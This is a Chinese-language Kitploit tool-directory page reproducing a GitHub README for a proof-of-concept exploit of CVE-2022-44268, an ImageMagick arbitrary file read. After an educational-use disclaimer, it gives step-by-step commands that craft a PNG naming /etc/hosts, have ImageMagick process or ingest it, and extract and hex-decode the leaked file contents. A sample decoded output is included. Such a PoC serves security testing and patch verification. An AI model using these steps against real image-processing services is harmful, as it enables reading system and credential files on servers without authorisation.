Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC — PoC payload生成器,用于CVE-2022-44268 ImageMagick任意文件读取漏洞。通过构造的PNG文件演示利用,用于教育性安全测试。 | Kitploit
工具/GitHubGitHub/duc-nt/cve-2022-44268-imagemagick-arbitrary-file-read-poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubduc-nt/cve-2022-44268-imagemagick-arbitrary-file-read-poc

CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC

PoC payload生成器,用于CVE-2022-44268 ImageMagick任意文件读取漏洞。通过构造的PNG文件演示利用,用于教育性安全测试。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
27537483年前Kitploit 审核通过

CVE-2022-44268 ImageMagick 任意文件读取 PoC

PoC for CVE-2022-44268 ImageMagick 任意文件读取 PoC - Payload生成器

本项目仅用于教育目的,不得用于违法活动或个人获利。

项目作者对因使用本项目材料可能造成的任何损害概不负责。

原始发现:https://www.metabaseq.com/imagemagick-zero-days/

使用方法:

安装依赖:

1. $ apt-get install pngcrush imagemagick exiftool exiv2 -y

更改你想要读取的文件名(如下所示):

2. $ pngcrush -text a "profile" "/etc/hosts" vjp.png

确认一切工作正常

3. $ exiv2 -pS pngout.png

通过 convert 触发 PoC,或将图片上传到存在漏洞的服务:

4. $ convert pngout.png gopro.png

查看已读取的文件内容:

5. $ identify -verbose gopro.png

解密内容:

6. $ python3 -c 'print(bytes.fromhex("23202f6574632f686f7374730a3132372e302e302e31096c6f63616c686f73740a0a232054686520666f6c6c6f77696e67206c696e65732061726520646573697261626c6520666f7220495076362063617061626c6520686f7374730a3a3a3109096c6f63616c686f7374206970362d6c6f63616c686f7374206970362d6c6f6f706261636b0a666630323a3a3109096970362d616c6c6e6f6465730a666630323a3a3209096970362d616c6c726f75746572730a6475636e740a").decode("utf-8"))'

演示

已在 Ubuntu 22.04 及默认安装的 ImageMagick 上测试。

下载工具